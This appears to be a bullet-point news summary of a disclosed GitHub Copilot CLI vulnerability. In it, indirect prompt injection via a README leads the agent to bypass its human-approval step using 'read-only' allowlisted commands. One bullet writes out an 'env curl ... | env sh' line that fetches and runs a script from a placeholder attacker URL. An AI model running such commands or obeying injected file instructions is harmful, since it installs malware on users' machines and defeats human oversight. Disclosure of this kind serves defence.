GitHub Copilot CLI downloads and executes malware
15 hours ago
- #Security Vulnerability
- #GitHub Copilot
- #CLI
- GitHub Copilot CLI vulnerabilities allow arbitrary shell command execution via indirect prompt injection without user approval.
- Malware can be downloaded and executed without user interaction beyond the initial query to Copilot CLI.
- GitHub responded that the issue is known but does not present a significant security risk.
- Copilot CLI's human-in-the-loop approval system can be bypassed using commands from a hard-coded 'read-only' list.
- Attackers can craft malicious commands that bypass command validation and execute immediately on the victim’s computer.
- The attack involves injecting malicious instructions via a README file or other vectors.
- Commands like 'env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh' bypass URL permission checks.
- The vulnerabilities are macOS-specific, but additional OS-agnostic and Windows-specific risks exist.
- GitHub's response to the disclosure was that the issue is known but not currently a priority for fixes.